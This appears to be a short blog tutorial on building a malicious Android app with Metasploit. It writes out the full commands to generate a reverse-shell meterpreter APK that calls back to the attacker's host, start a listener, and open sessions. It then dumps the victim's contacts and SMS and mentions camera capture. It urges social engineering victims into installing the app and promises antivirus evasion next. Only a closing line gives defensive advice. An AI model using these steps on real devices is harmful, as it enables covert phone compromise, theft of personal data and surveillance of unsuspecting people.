How To Create a Malicious App for Android

So, recently got interested in how secure Android apps are and how I could learn a bit more about them. The best way to learn? Create my own malicious App!

What else would we use other than Metasploit?

So we fire up the console like so…

service postgresql start

msfconsole

First we need to create the malicious .apk file, so open another Terminal Window and use the following making sure you enter your IP and port number after the “=” symbols.

msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xxxx -o malicious.apk

You can name the app whatever you like using the “-o” switch. There are also other options you can specify but we will keep it simple for now.

In the first Window running Metasploit we now start a handler which will “listen” for when our app is installed and used which launches the connection attempt. We do this like so.

use exploit/multi/handler

Then we need to set IP, Port and Payload.  The port and IP need to be the same set in the previous steps when using msfvenom

set LHOST xx.xx.xx.xx

set LPORT xxxx

set PAYLOAD android/meterpreter/reverse_tcp

We can check what is required for an exploit at any time once it is loaded by running

show options

We have everything we need now configured so we can start the “listener”

run

Then we use social engineering to try and get someone to install and run it.

When they do you will the connection come back from the phone.

In this example we got 2 connections! We can list them with this command

sessions -i

We can then connect by using the same command but choosing which session we want to connect to.

sessions 1

And then quickly get some info to confirm the device.

sysinfo

Then we can quickly dump info from the phone imediately using the dump commands

dump_contacts

dump_sms

You can also capture a screen shot, take a photo front either camera, or even stream live from either camera on the device. Scary huh?

If you have NO anti Virus on your Android, and you have disabled the “verify app” feature then this simple app will run without any issues.

If you have an Android phone, enable the app verifier, and get some anti virus to at least give yourself a fighting chance!

There will be a follow up to this post as there are tools we can use to make our malicious apps look better and be less likely to be blocked by anti virus. That’s it for now though.